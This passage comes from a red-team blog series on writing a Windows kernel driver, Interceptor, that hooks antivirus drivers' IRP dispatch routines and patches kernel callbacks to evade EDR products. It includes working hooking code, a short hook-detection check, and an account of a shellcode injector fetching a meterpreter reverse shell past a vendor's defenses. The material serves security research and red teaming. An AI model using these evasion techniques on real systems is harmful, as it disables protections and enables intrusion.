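using ToyDispatch = int (*)(const ToyIrp&);
// One slot per major function code, from 0 up to and including the maximum.
using ToyDispatchTable = std::array<ToyDispatch, kToyMaxMajorFunction + 1>;

struct ToyDriverObject {
    ToyDispatchTable MajorFunction{};
};

ToyDispatchTable g_originals{};   // saved pointers, needed to forward and to unhook
int g_intercepted = 0;

// Replacement routine: observe the request, then forward it to the original.
int ToyGenericHook(const ToyIrp& irp) {
    assert(irp.majorFunction <= kToyMaxMajorFunction);
    assert(g_originals[irp.majorFunction] != nullptr);
    ++g_intercepted;
    return g_originals[irp.majorFunction](irp);
}

void ToyHookDriver(ToyDriverObject& target) {
    for (std::size_t i = 0; i <= kToyMaxMajorFunction; ++i) {
        g_originals[i] = target.MajorFunction[i];     // save
        target.MajorFunction[i] = &ToyGenericHook;    // replace
    }
}

void ToyUnhookDriver(ToyDriverObject& target) {
    for (std::size_t i = 0; i <= kToyMaxMajorFunction; ++i) {
        target.MajorFunction[i] = g_originals[i];     // restore
    }
}

// Stand-in for one of the target driver's own dispatch routines.
int ToyTargetHandler(const ToyIrp& irp) { return irp.payload * 2; }
```

After ToyHookDriver() the target still answers every request exactly as before, since the hook forwards to the saved pointer; the only visible difference is that g_intercepted increases. Hooking the same object twice without unhooking would overwrite the saved pointers with the hook itself, so a real implementation needs to guard against that.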

As an example, I hooked the disk driver’s IRP_MJ_DEVICE_CONTROL dispatch routine and intercepted the calls:

[Figure: Hooked IRP Disk Driver]

This method can be used to intercept communications to any driver but is fairly easy to detect. A driver controlled by EDR/AV could iterate over its own MajorFunction array and check the function pointer’s address to see if it is located in its own address range. If the function pointer is located outside its own address range, that means the dispatch routine was hooked.
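
Such a self-check is little more than a range comparison. The sketch below works on plain numbers so it can run anywhere; ToyImageRange and both functions are hypothetical, and in a real driver the base and size would presumably come from DriverObject->DriverStart and DriverObject->DriverSize.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

// Where a driver image is mapped (illustrative values only).
struct ToyImageRange {
    std::uint64_t base;
    std::uint64_t size;
};

// True when `address` lies in [base, base + size).
constexpr bool IsInsideImage(const ToyImageRange& image, std::uint64_t address) {
    return address >= image.base && address - image.base < image.size;
}

// Counts the dispatch pointers that fall outside the driver's own image.
std::size_t CountHookedEntries(const ToyImageRange& image,
                               const std::uint64_t* dispatchPointers, std::size_t count) {
    assert(dispatchPointers != nullptr || count == 0);
    std::size_t hooked = 0;
    for (std::size_t i = 0; i < count; ++i) {
        if (!IsInsideImage(image, dispatchPointers[i])) {
            ++hooked;
        }
    }
    return hooked;
}
```

One caveat for anyone turning this into a real check: slots a driver never sets keep pointing at a default routine inside the kernel image, so a naive range test would flag those as hooked unless they are whitelisted.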

4. Conclusion

To defeat EDRs in kernel space, it is important to know what goes on at the core, namely the driver. In this blogpost we examined the anatomy of a driver, its functions, and their main responsibilities. We established that a driver needs to communicate with other drivers and applications in user space, which it does via dispatch routines registered in the driver’s MajorFunction array.

We then briefly looked at how we can intercept these communications by using a technique called IRP MajorFunction hooking, which patches the target driver’s dispatch routines in memory with pointers to our own functions, so we can inspect or redirect traffic.

Kernel Karnage – Part 3 (Challenge Accepted)

16 November 2021 at 08:28

While I was cruising along, taking in the views of the kernel landscape, I received a challenge …

1. Player 2 has entered the game

The past weeks I mostly experimented with existing tooling and got acquainted with the basics of kernel driver development. I managed to get a quick win versus $vendor1 but that didn’t impress our blue team, so I received a challenge to bypass $vendor2. I have to admit, after trying all week to get around the protections, $vendor2 is definitely a bigger beast to tame.

I foolishly tried to rely on blocking the kernel callbacks using the Evil driver from my first post and quickly concluded that wasn’t going to cut it. To win this fight, I needed bigger guns.

2. Know your enemy

$vendor2’s defenses consist of a number of driver modules:

  • eamonm.sys (monitoring agent?)
  • edevmon.sys (device monitor?)
  • eelam.sys (early launch anti-malware driver)
  • ehdrv.sys (helper driver?)
  • ekbdflt.sys (keyboard filter?)
  • epfw.sys (personal firewall driver?)
  • epfwlwf.sys (personal firewall light-weight filter?)
  • epfwwfp.sys (personal firewall filter?)

and a user mode service: ekrn.exe ($vendor2 kernel service) running as a System Protected Process (enabled by eelam.sys driver).

At this stage I am only guessing the roles and functionality of the different driver modules based on their names and some behaviour I have observed during various tests, mainly because I haven’t done any reverse-engineering yet. Since I am interested in running malicious binaries on the protected system, my initial attack vector is to disable the functionality of the ehdrv.sys, epfw.sys and epfwwfp.sys drivers. As far as I can tell using WinObj and listing all loaded modules in WinDbg (lm command), epfwlwf.sys does not appear to be running and neither does eelam.sys, which I presume is only used in the initial stages when the system is booting up to start ekrn.exe as a System Protected Process.

[Figure: WinObj GLOBAL?? directory listing]

In the context of my internship being focused on the kernel, I have not (yet) considered attacking the protected ekrn.exe service. According to the Microsoft Documentation, a protected process is shielded from code injection and other attacks from admin processes. However, a quick Google search tells me otherwise 😉

3. Interceptor

With my eye on the ehdrv.sys, epfw.sys and epfwwfp.sys drivers, I noticed they all have registered callbacks, either for process creation, thread creation, or both. I’m still working on expanding my own driver to include callback functionality, which will also look at image load callbacks, which are used to detect the loading of drivers and so on. Luckily, the Evil driver has got this angle (partially) covered for now.

[Figure: ESET registered callbacks]

Unfortunately, we cannot solely rely on blocking kernel callbacks. Other sources contacting the $vendor2 drivers and reporting suspicious activity should also be taken into consideration. In my previous post I briefly touched on IRP MajorFunction hooking, which is a good, although easy to detect, way of intercepting communications between drivers and other applications.

I wrote my own driver called Interceptor, which combines the ideas of @zodiacon’s Driver Monitor project and @fdiskyou’s Evil driver.

To gather information about all the loaded drivers on the system, I used the AuxKlibQueryModuleInformation() function. Note that because I return output via pass-by-reference parameters, the calling function is responsible for cleaning up any allocated memory and preventing a leak.

NTSTATUS ListDrivers(PAUX_MODULE_EXTENDED_INFO& outModules, ULONG& outNumberOfModules) {
    NTSTATUS status;
    ULONG modulesSize = 0;
    PAUX_MODULE_EXTENDED_INFO modules;
    ULONG numberOfModules;

    status = AuxKlibInitialize();
    if(!NT_SUCCESS(status))
        return status;

    status = AuxKlibQueryModuleInformation(&modulesSize, sizeof(AUX_MODULE_EXTENDED_INFO), nullptr);
    if (!NT_SUCCESS(status) || modulesSize == 0)
        return status;

    numberOfModules = modulesSize / sizeof(AUX_MODULE_EXTENDED_INFO);

    modules = (AUX_MODULE_EXTENDED_INFO*)ExAllocatePoolWithTag(PagedPool, modulesSize, DRIVER_TAG);
    if (modules == nullptr)
        return STATUS_INSUFFICIENT_RESOURCES;

    RtlZeroMemory(modules, modulesSize);

    status = AuxKlibQueryModuleInformation(&modulesSize, sizeof(AUX_MODULE_EXTENDED_INFO), modules);
    if (!NT_SUCCESS(status)) {
        ExFreePoolWithTag(modules, DRIVER_TAG);
        return status;
    }

    //calling function is responsible for cleanup
    //if (modules != NULL) {
    //	ExFreePoolWithTag(modules, DRIVER_TAG);
    //}

    outModules = modules;
    outNumberOfModules = numberOfModules;

    return status;
}

Using this function, I can obtain information like the driver’s full path, its file name on disk and its image base address. This information is then passed on to the user mode application (InterceptorCLI.exe) or used to locate the driver’s DriverObject and MajorFunction array so it can be hooked.

To hook the driver’s dispatch routines, I still rely on the ObReferenceObjectByName() function, which accepts a UNICODE_STRING parameter containing the driver’s name in the format \\Driver\\DriverName. In this case, the driver’s name is derived from the driver’s file name on disk: mydriver.sys –> \\Driver\\mydriver.

However, it should be noted that this is not a reliable way to obtain a handle to the DriverObject, since the driver’s name can be set to anything in the driver’s DriverEntry() function when it creates the DeviceObject and symbolic link.
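The file-name-to-driver-name mapping described above can be sketched in plain C++. This is a minimal user-mode illustration, not Interceptor's actual code: the helper name DriverNameFromFileName is hypothetical, and the result is only a guess at the real object name, for the reason given above.

```cpp
#include <string>

// Hypothetical helper: derive an object-manager driver name from a file name,
// e.g. L"mydriver.sys" -> L"\\Driver\\mydriver". The result is only a guess,
// because a driver may be registered under a different name.
std::wstring DriverNameFromFileName(const std::wstring& fileName) {
    // Strip any directory part first
    const std::size_t slash = fileName.find_last_of(L"\\/");
    std::wstring base = (slash == std::wstring::npos) ? fileName
                                                      : fileName.substr(slash + 1);

    // Strip the extension, if there is one
    const std::size_t dot = base.find_last_of(L'.');
    if (dot != std::wstring::npos && dot != 0) {
        base.erase(dot);
    }

    return L"\\Driver\\" + base;
}
```

In the driver itself, the resulting string would still have to be turned into a UNICODE_STRING before it can be passed to ObReferenceObjectByName().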

Once a handle is obtained, the target driver will be stored in a global array and its dispatch routines hooked and replaced with my InterceptGenericDispatch() function. The target driver’s DriverObject->DriverUnload dispatch routine is separately hooked and replaced by my GenericDriverUnload() function, to prevent the target driver from unloading itself without us knowing about it and causing a nightmare with dangling pointers.

NTSTATUS InterceptGenericDispatch(PDEVICE_OBJECT DeviceObject, PIRP Irp) {
    auto stack = IoGetCurrentIrpStackLocation(Irp);
    auto status = STATUS_UNSUCCESSFUL;
    KdPrint((DRIVER_PREFIX "GenericDispatch: call intercepted\n"));

    //inspect IRP
    if(isTargetIrp(Irp)) {
        //modify IRP
        status = ModifyIrp(Irp);
        //call original
        for (int i = 0; i < MaxIntercept; i++) {
            if (globals.Drivers[i].DriverObject == DeviceObject->DriverObject) {
                auto CompletionRoutine = globals.Drivers[i].MajorFunction[stack->MajorFunction];
                return CompletionRoutine(DeviceObject, Irp);
            }
        }
    }
    else if (isDiscardIrp(Irp)) {
        //call own completion routine
        status = STATUS_INVALID_DEVICE_REQUEST;
	    return CompleteRequest(Irp, status, 0);
    }
    else {
        //call original
        for (int i = 0; i < MaxIntercept; i++) {
            if (globals.Drivers[i].DriverObject == DeviceObject->DriverObject) {
                auto CompletionRoutine = globals.Drivers[i].MajorFunction[stack->MajorFunction];
                return CompletionRoutine(DeviceObject, Irp);
            }
        }
    }
    return CompleteRequest(Irp, status, 0);
}

void GenericDriverUnload(PDRIVER_OBJECT DriverObject) {
	for (int i = 0; i < MaxIntercept; i++) {
		if (globals.Drivers[i].DriverObject == DriverObject) {
			if (globals.Drivers[i].DriverUnload) {
				globals.Drivers[i].DriverUnload(DriverObject);
			}
			UnhookDriver(i);
			return;
		}
	}
	//should never be reached: the unloading driver was not found in the hook table
	NT_ASSERT(false);
}
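
The bookkeeping behind hooking and unhooking can be tried out in user mode. The following is a minimal sketch under stated assumptions: FakeDriverObject, HookedDriver, HookDriver and the int-returning dispatch signature are simplified stand-ins invented for illustration, not the real DRIVER_OBJECT or Interceptor's implementation. It only shows the idea of saving the original table, swapping in an interceptor, and restoring the table later.

```cpp
#include <array>
#include <cstddef>

constexpr std::size_t kMajorFunctionCount = 28;  // IRP_MJ_MAXIMUM_FUNCTION + 1
constexpr int kMaxIntercept = 64;                // size of the hook table

struct FakeDriverObject;
using DispatchFn = int (*)(FakeDriverObject* driver, std::size_t major);

// Stand-in for a driver object: just its table of dispatch routines
struct FakeDriverObject {
    std::array<DispatchFn, kMajorFunctionCount> MajorFunction{};
};

// One slot of the global hook table: the target and its saved routines
struct HookedDriver {
    FakeDriverObject* DriverObject = nullptr;
    std::array<DispatchFn, kMajorFunctionCount> Original{};
};

static std::array<HookedDriver, kMaxIntercept> g_hooked{};
static int g_interceptedCalls = 0;

// Replacement routine: count the call, then forward to the saved original
int InterceptDispatch(FakeDriverObject* driver, std::size_t major) {
    ++g_interceptedCalls;
    for (const HookedDriver& slot : g_hooked) {
        if (slot.DriverObject == driver && slot.Original[major] != nullptr) {
            return slot.Original[major](driver, major);
        }
    }
    return -1;  // no original routine known for this driver
}

// Saves the original table in the first free slot and installs the hook
int HookDriver(FakeDriverObject* driver) {
    for (int i = 0; i < kMaxIntercept; ++i) {
        if (g_hooked[i].DriverObject == nullptr) {
            g_hooked[i].DriverObject = driver;
            g_hooked[i].Original = driver->MajorFunction;
            driver->MajorFunction.fill(&InterceptDispatch);
            return i;
        }
    }
    return -1;  // table full
}

// Restores the saved table and frees the slot
bool UnhookDriver(int index) {
    if (index < 0 || index >= kMaxIntercept) return false;
    HookedDriver& slot = g_hooked[index];
    if (slot.DriverObject == nullptr) return false;
    slot.DriverObject->MajorFunction = slot.Original;
    slot = HookedDriver{};
    return true;
}

// Example "original" routine used to exercise the model
int OriginalDispatch(FakeDriverObject*, std::size_t major) {
    return static_cast<int>(major) + 100;
}
```

Filling a FakeDriverObject with OriginalDispatch, hooking it, and calling one of its table entries goes through InterceptDispatch first and still returns the original result. Unhooking puts the original pointers back, which is the same reason the real unload routine must unhook before the target driver disappears.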

4. Early bird gets the worm

Armed with my new Interceptor driver, I set out to try and defeat $vendor2 once more. Alas, no luck: mimikatz.exe was still detected and blocked. This got me thinking: running such a well-known malicious binary without any attempt to hide or obfuscate it is probably not realistic in the first place. A signature check alone would flag the binary as malicious. So, I decided to write my own payload injector for testing purposes.

Based on research presented in An Empirical Assessment of Endpoint Detection and Response Systems against Advanced Persistent Threats Attack Vectors by George Karantzas and Constantinos Patsakis, I opted for a shellcode injector using:
– the EarlyBird code injection technique
– PPID spoofing
– Microsoft’s Code Integrity Guard (CIG) enabled to prevent non-Microsoft DLLs from being injected into our process
– Direct system calls to bypass any user mode hooks.

The injector delivers shellcode to fetch a “windows/x64/meterpreter/reverse_tcp” payload from the Metasploit framework.

Using my shellcode injector, combined with the Evil driver to disable kernel callbacks and my Interceptor driver to intercept any IRPs to the ehdrv.sys, epfw.sys and epfwwfp.sys drivers, the meterpreter payload is still detected but not blocked by $vendor2.

5. Conclusion

In this blogpost, we took a look at a more advanced Anti-Virus product, consisting of multiple kernel modules and better detection capabilities in both user mode and kernel mode. We took note of the different AV kernel drivers that are loaded and the callbacks they subscribe to. We then combined the Evil driver and the Interceptor driver to disable the kernel callbacks and hook the IRP dispatch routines, before executing a custom shellcode injector to fetch a meterpreter reverse shell payload.

Even when armed with a malicious kernel driver, a good EDR/AV product can still be a major hurdle to bypass. Combining techniques in both kernel and user land is the most effective solution, although it might not be the most realistic. With the current approach, the Evil driver does not (yet) take into account image load, registry and object creation callbacks, nor are the AV minifilters addressed.

About the authors

Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.

Kernel Karnage – Part 4 (Inter(ceptor)mezzo)

19 November 2021 at 15:18

To make up for the long wait between parts 2 and 3, we’re releasing another blog post this week. Part 4 is a bit smaller than the others, an intermezzo between parts 3 and 5 if you will, discussing interceptor.

1. RTFM & W(rite)TFM!

The past few weeks I spent a lot of time getting acquainted with the Windows kernel and the inner workings of certain EDR/AV products. I also covered the two main methods of attacking the EDR/AV drivers, namely kernel callback patching and IRP MajorFunction hooking. I’ve been working on my own driver called Interceptor, which will implement both these techniques as well as a method to load itself into kernel memory, bypassing Driver Signature Enforcement (DSE).

I’m of the opinion that when writing tools or exploits, the author should know exactly what each part of his/her/their code is responsible for, how it works and avoid copy pasting code from similar projects without fully understanding it. With that said, I’m writing Interceptor based on numerous other projects, so I’m taking my time to go through their associated blogposts and understand their working and purpose.

Interceptor currently supports IRP hooking/unhooking drivers by name or by index based on loaded modules.

Using the -l option, Interceptor will list all the currently loaded modules on the system and assign them an index. This index can be used to hook the module with the -h option.

Using the -lh option, Interceptor will list all the currently hooked modules with their corresponding index in the global hooked drivers array. Interceptor currently supports hooking up to 64 drivers. The index can be used with the -u option to unhook the module.

Interceptor list hooked drivers

Once a module is hooked, Interceptor’s InterceptGenericDispatch() function will be called whenever an IRP is received. The current function reports via a debug message that a call was intercepted and then calls the original dispatch routine (named CompletionRoutine in the code). I’m currently working on a method to inspect and modify the IRPs before passing them to the original dispatch routine.

NTSTATUS InterceptGenericDispatch(PDEVICE_OBJECT DeviceObject, PIRP Irp) {
    auto stack = IoGetCurrentIrpStackLocation(Irp);
    auto status = STATUS_UNSUCCESSFUL;
    KdPrint((DRIVER_PREFIX "GenericDispatch: call intercepted\n"));

    //inspect IRP
    if(isTargetIrp(Irp)) {
        //modify IRP
        status = ModifyIrp(Irp);
        //call original
        for (int i = 0; i < MaxIntercept; i++) {
            if (globals.Drivers[i].DriverObject == DeviceObject->DriverObject) {
                auto CompletionRoutine = globals.Drivers[i].MajorFunction[stack->MajorFunction];
                return CompletionRoutine(DeviceObject, Irp);
            }
        }
    }
    else if (isDiscardIrp(Irp)) {
        //call own completion routine
        status = STATUS_INVALID_DEVICE_REQUEST;
	    return CompleteRequest(Irp, status, 0);
    }
    else {
        //call original
        for (int i = 0; i < MaxIntercept; i++) {
            if (globals.Drivers[i].DriverObject == DeviceObject->DriverObject) {
                auto CompletionRoutine = globals.Drivers[i].MajorFunction[stack->MajorFunction];
                return CompletionRoutine(DeviceObject, Irp);
            }
        }
    }
    return CompleteRequest(Irp, status, 0);
}

I’m also working on a module that supports patching kernel callbacks. The difficulty here is locating the different callback arrays by enumerating their calling functions and looking for certain opcode patterns, which change between different versions of Windows.

As mentioned in one of my previous blogposts, locating the callback arrays for PsSetCreateProcessNotifyRoutine() and PsSetCreateThreadNotifyRoutine() is done by looking for a CALL instruction to PspSetCreateProcessNotifyRoutine() and PspSetCreateThreadNotifyRoutine() respectively, followed by looking for a LEA instruction.

Finding the callback array for PsSetLoadImageNotifyRoutine() is slightly different as the function first jumps to PsSetLoadImageNotifyRoutineEx(). Next, we skip looking for the CALL instruction and go straight for the LEA instruction instead, which puts the callback array address into RCX.

LoadImage callback array
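
The first half of that search, following a CALL to its target, can be modelled on a plain byte buffer. This is a minimal sketch that assumes the first 0xE8 byte in the scanned range really is a CALL rel32 opcode; ResolveFirstCall is a hypothetical helper name, and offsets into the buffer stand in for kernel addresses.

```cpp
#include <cstddef>
#include <cstdint>
#include <cstring>

// Returns the offset (within `code`) targeted by the first CALL rel32 (0xE8)
// found in [start, start + maxScan), or -1 if none is found.
// Assumption: the first 0xE8 byte really is a CALL opcode. A real scanner
// has to cope with 0xE8 showing up inside other instructions.
std::ptrdiff_t ResolveFirstCall(const std::uint8_t* code, std::size_t size,
                                std::size_t start, std::size_t maxScan) {
    for (std::size_t i = start; i < start + maxScan && i + 5 <= size; ++i) {
        if (code[i] != 0xE8) continue;

        // The displacement is a signed 32-bit little-endian value
        std::int32_t rel = 0;
        std::memcpy(&rel, code + i + 1, sizeof(rel));

        // Target = address of the next instruction (i + 5) + displacement
        return static_cast<std::ptrdiff_t>(i) + 5 + rel;
    }
    return -1;
}
```

Because the displacement is signed, the same arithmetic covers targets located before as well as after the CALL instruction.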

Interceptor’s callback module currently implements patching functionality for Process and Thread callbacks.

The registered callbacks on the system and their patch status can be listed using the -lc command.

2. Conclusion

In the previous blogpost of this series, we combined the functionality of two drivers, Evilcli and Interceptor, to partially bypass $vendor2. In this post we took a closer look at Interceptor’s capabilities and future features that are in development. In the upcoming blogposts, we’ll see how Interceptor as a fully standalone driver is able to conquer not just $vendor2, but other EDR products as well.


Kernel Karnage – Part 5 (I/O & Callbacks)

30 November 2021 at 10:02

After showing interceptor’s options, it’s time to continue coding! On the menu are registry callbacks, doubly linked lists and a struggle with I/O in native C.

1. Interceptor 2.0

Until now, I relied on the Evil driver to patch kernel callbacks while I attempted to tackle $vendor2. However, the Evil driver only implements patching for process and thread callbacks. This week I spent a good amount of time porting the functionality from the Evil driver over to Interceptor and added support for patching image load callbacks, as well as a first effort at enumerating registry callbacks.

While I was working, I stumbled upon Mimidrv In Depth: Exploring Mimikatz’s Kernel Driver by Matt Hand, an excellent blogpost which aims to clarify the inner workings of Mimikatz’ kernel driver. Looking at the Mimikatz kernel driver code made me realize I’m a terrible C/C++ developer and I wish drivers were written in C# instead, but it also gave me an insight into handling different aspects of the interaction process between the kernel driver and the user mode application.

To make up for my sins, I refactored a lot of my code to use a more modular approach and keep the actual driver code clean and limited to driver-specific functionality. For those interested, the architecture of Interceptor looks somewhat like this:

.
+-- Driver
|   +-- Header Files
|   |   +-- Common.h                | contains structs and IOCTLs shared between the driver and CLI
|   |   +-- Globals.h               | contains global variables used in all modules
|   |   +-- pch.h                   | precompiled header
|   |   +-- Interceptor.h           | function prototypes
|   |   +-- Intercept.h             | function prototypes
|   |   +-- Callbacks.h             | function prototypes
|   +-- Source Files
|   |   +-- pch.cpp
|   |   +-- Interceptor.cpp         | driver code
|   |   +-- Intercept.cpp           | IRP hooking module
|   |   +-- Callbacks.cpp           | Callback patching module
+-- CLI
|   +-- Source Files
|   |   +-- InterceptorCLI.cpp

2. Driver I/O and why it’s a mess

Something else that needs overhauling is the way the driver handles I/O from the user mode application. When the user mode application requests a listing of all the present drivers on the system, or the registered callbacks, a lot of data needs to be collected and sent back in an efficient and structured manner. I’m not particularly fussy about speed or memory usage, but I would like to keep the code tidy, easy to read and understand, and keep the risk of dangling pointers and memory leaks at a minimum.

Drivers typically handle I/O in 3 different ways:

  1. Using the IRP_MJ_READ dispatch routine with ReadFile()
  2. Using the IRP_MJ_WRITE dispatch routine with WriteFile()
  3. Using the IRP_MJ_DEVICE_CONTROL dispatch routine with DeviceIoControl()

Using 3 different methods:

  1. Buffered I/O
  2. Direct I/O
  3. On an IOCTL basis
    1. METHOD_NEITHER
    2. METHOD_BUFFERED
    3. METHOD_IN_DIRECT
    4. METHOD_OUT_DIRECT

Since Interceptor returns different data depending on the request (IRP) it received, the I/O is handled in the IRP_MJ_DEVICE_CONTROL dispatch routine on an IOCTL basis using METHOD_BUFFERED. As discussed in Part 2, an IRP is accompanied by one or more IO_STACK_LOCATION structures which we can retrieve using IoGetCurrentIrpStackLocation(). The current stack location is important, because it contains several fields with information regarding user buffers.
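
The transfer method is not a separate setting: it is encoded in the two lowest bits of the I/O control code itself. The sketch below re-declares the bit layout of the CTL_CODE macro from the Windows headers so that it compiles without the WDK. The device type 0x8000 and function number 0x800 are hypothetical values picked from the vendor-defined ranges, not Interceptor's real IOCTLs.

```cpp
#include <cstdint>

// Same bit layout as the CTL_CODE macro from the Windows headers:
// DeviceType (bits 16-31) | Access (14-15) | Function (2-13) | Method (0-1)
constexpr std::uint32_t CtlCode(std::uint32_t deviceType, std::uint32_t function,
                                std::uint32_t method, std::uint32_t access) {
    return (deviceType << 16) | (access << 14) | (function << 2) | method;
}

// Transfer types and access value as defined in the Windows headers
constexpr std::uint32_t kMethodBuffered  = 0;
constexpr std::uint32_t kMethodInDirect  = 1;
constexpr std::uint32_t kMethodOutDirect = 2;
constexpr std::uint32_t kMethodNeither   = 3;
constexpr std::uint32_t kFileAnyAccess   = 0;

// Hypothetical values: device types >= 0x8000 and function codes >= 0x800
// are the ranges available to third-party drivers.
constexpr std::uint32_t kDeviceInterceptor = 0x8000;
constexpr std::uint32_t kIoctlListDrivers =
    CtlCode(kDeviceInterceptor, 0x800, kMethodBuffered, kFileAnyAccess);

// Extracts the transfer method from a control code
constexpr std::uint32_t MethodFromCtlCode(std::uint32_t code) {
    return code & 3;
}

static_assert(kIoctlListDrivers == 0x80002000u, "unexpected control code");
static_assert(MethodFromCtlCode(kIoctlListDrivers) == kMethodBuffered,
              "method lives in the two lowest bits");
```

Switching an IOCTL from METHOD_BUFFERED to METHOD_NEITHER therefore changes its numeric value, so the driver and the user mode application have to agree on the same definition in a shared header.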

When using METHOD_BUFFERED, the I/O Manager will assist us with managing resources. When the request comes in, the I/O manager will allocate the system buffer from non-paged pool memory (non-paged pool memory is always present in RAM) with a size that is the maximum of the lengths of the input and output buffers and then copy the user input buffer to the system buffer. When the request is complete, the I/O manager copies the specified number of bytes from the system buffer to the user output buffer.

PIO_STACK_LOCATION stack = IoGetCurrentIrpStackLocation(Irp);
//size of user input buffer
size_t szBufferIn = stack->Parameters.DeviceIoControl.InputBufferLength;
//size of user output buffer
size_t szBufferOut = stack->Parameters.DeviceIoControl.OutputBufferLength;
//system buffer used for both reading and writing
PVOID bufferInOut = Irp->AssociatedIrp.SystemBuffer;
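
To make the copy-in/copy-out behaviour concrete, here is a user-mode model of what the I/O manager does around a METHOD_BUFFERED request. It is a sketch only: SimulateBufferedIoctl, BufferedHandler and DoubleValue are hypothetical names, and a std::vector stands in for the non-paged system buffer.

```cpp
#include <algorithm>
#include <cstddef>
#include <cstring>
#include <vector>

// Handler signature for the model: works on the shared system buffer and
// returns how many bytes of it are valid output (the "Information" value).
using BufferedHandler = std::size_t (*)(void* systemBuffer, std::size_t inLen,
                                        std::size_t outLen);

// User-mode model of the I/O manager's work for METHOD_BUFFERED
std::size_t SimulateBufferedIoctl(const void* userIn, std::size_t inLen,
                                  void* userOut, std::size_t outLen,
                                  BufferedHandler handler) {
    // 1. One system buffer, sized for the larger of the two user buffers
    std::vector<unsigned char> systemBuffer(std::max(inLen, outLen));

    // 2. Copy the caller's input into it
    if (inLen != 0) std::memcpy(systemBuffer.data(), userIn, inLen);

    // 3. The driver reads its input from and writes its output to that buffer
    const std::size_t information =
        std::min(handler(systemBuffer.data(), inLen, outLen), outLen);

    // 4. On completion, copy `information` bytes back to the caller
    if (information != 0) std::memcpy(userOut, systemBuffer.data(), information);
    return information;
}

// Example handler: doubles a 32-bit value in place
std::size_t DoubleValue(void* systemBuffer, std::size_t inLen, std::size_t outLen) {
    if (inLen < sizeof(int) || outLen < sizeof(int)) return 0;  // validate lengths
    int value = 0;
    std::memcpy(&value, systemBuffer, sizeof(value));
    value *= 2;
    std::memcpy(systemBuffer, &value, sizeof(value));
    return sizeof(value);
}
```

Because input and output share one buffer, a handler has to read everything it needs from the input before it starts writing output, and it should always check both lengths before touching the buffer.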

Using buffered I/O has a drawback, namely we need to define common I/O structures for use in both driver and user mode application, so we know what input, output and size to expect. As an example, we will pass an index and driver name from our user mode application to our driver:

//Common.h
struct USER_DRIVER_DATA {
    char driverName[256];
    int index;
};

//ApplicationCLI.cpp
DWORD lpBytesReturned;
USER_DRIVER_DATA inputBuffer = {};
inputBuffer.index = 1;
//a string literal cannot be assigned to a char array, so copy it instead
strcpy_s(inputBuffer.driverName, "\\Driver\\MyDriver");
DeviceIoControl(hDevice, IOCTL_MYDRIVER_GET_DRIVER_INFO, &inputBuffer, sizeof(inputBuffer), nullptr, 0, &lpBytesReturned, nullptr);

//MyDriver.cpp
auto data = (USER_DRIVER_DATA*)Irp->AssociatedIrp.SystemBuffer;
int index = data->index;
char driverName[256];
strcpy_s(driverName, data->driverName);

Using this approach, we quickly end up with a lot of different structures in Common.h for each of the different I/O requests, so I went looking for a “better”, more generic way of handling I/O. I decided to look at the Mimikatz kernel driver code again for inspiration. The Mimikatz driver uses METHOD_NEITHER, combined with a custom buffer and a wrapper around the RtlStringCbPrintfExW() function.

When using METHOD_NEITHER, the I/O Manager is not involved and it is up to the driver itself to manage the user buffers. The input and output buffers are no longer copied to and from the system buffer.

PIO_STACK_LOCATION stack = IoGetCurrentIrpStackLocation(Irp);
//user input buffer
PVOID bufferIn = stack->Parameters.DeviceIoControl.Type3InputBuffer;
//user output buffer
PVOID bufferOut = Irp->UserBuffer;

The idea behind the Mimikatz approach is to declare a single buffer structure and a wrapper kprintf() around RtlStringCbPrintfExW():

typedef struct _MY_BUFFER {
    size_t* szBuffer;
    PWSTR* Buffer;
} MY_BUFFER, * PMY_BUFFER;

#define kprintf(MyBuffer, Format, ...) (RtlStringCbPrintfExW(*(MyBuffer)->Buffer, *(MyBuffer)->szBuffer, (MyBuffer)->Buffer, (MyBuffer)->szBuffer, STRSAFE_NO_TRUNCATION, Format, __VA_ARGS__))

The kprintf() wrapper accepts a pointer to our buffer structure MY_BUFFER, a format string and multiple arguments to be used with the format string. Using the provided format string, it will write a byte-counted, null-terminated text string to the supplied buffer *(MyBuffer)->Buffer.

Using this approach, the user mode application can dynamically allocate its output buffer using bufferOut = LocalAlloc(LPTR, szBufferOut). This will allocate the specified number of bytes (szBufferOut) as fixed memory on the heap and initialize it to zero (LPTR (0x0040) flag = LMEM_FIXED (0x0000) + LMEM_ZEROINIT (0x0040) flags).

We can then write to this output buffer in our driver using the kprintf() wrapper:

MY_BUFFER kOutputBuffer = { &szBufferOut, (PWSTR*)&bufferOut };
szBufferOut = stack->Parameters.DeviceIoControl.OutputBufferLength;
bufferOut = Irp->UserBuffer;
szBufferIn = stack->Parameters.DeviceIoControl.InputBufferLength;
bufferIn = stack->Parameters.DeviceIoControl.Type3InputBuffer;

kprintf(&kOutputBuffer, L"Input: %s\nOutput: %s\n", bufferIn, L"our output");
ULONG_PTR information = stack->Parameters.DeviceIoControl.OutputBufferLength - szBufferOut;

return CompleteIrp(Irp, status, information);

If the output buffer appears too small for all the data we wish to write, kprintf() will return STATUS_BUFFER_OVERFLOW. Because the STRSAFE_NO_TRUNCATION flag is set in RtlStringCbPrintfExW(), the contents of the output buffer will not be modified, so we can increase the size, reallocate the output buffer on the heap and try again.
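
The cursor-advancing buffer and the grow-and-retry loop can be tried out in user mode. The sketch below is only an analogue of the approach described above: std::vswprintf stands in for RtlStringCbPrintfExW(), and OutBuffer, AppendFormat and FormatWithRetry are hypothetical names. In the real setup the retry would wrap a DeviceIoControl() call rather than a local function.

```cpp
#include <cstdarg>
#include <cstddef>
#include <cwchar>
#include <vector>

// Mirrors the MY_BUFFER idea: pointers to the caller's "bytes remaining"
// counter and write cursor, both of which are updated on success.
struct OutBuffer {
    std::size_t* szBuffer;  // bytes remaining
    wchar_t**    Buffer;    // current write position
};

// User-mode stand-in for kprintf(): appends formatted text, or fails without
// advancing the cursor when the text does not fit (no truncation).
bool AppendFormat(OutBuffer* out, const wchar_t* format, ...) {
    const std::size_t capacity = *out->szBuffer / sizeof(wchar_t);  // in characters
    if (capacity == 0) return false;

    va_list args;
    va_start(args, format);
    const int written = std::vswprintf(*out->Buffer, capacity, format, args);
    va_end(args);

    if (written < 0) {              // did not fit (or formatting error)
        (*out->Buffer)[0] = L'\0';  // discard any partial output
        return false;
    }
    *out->Buffer += written;        // cursor now points at the terminator
    *out->szBuffer -= static_cast<std::size_t>(written) * sizeof(wchar_t);
    return true;
}

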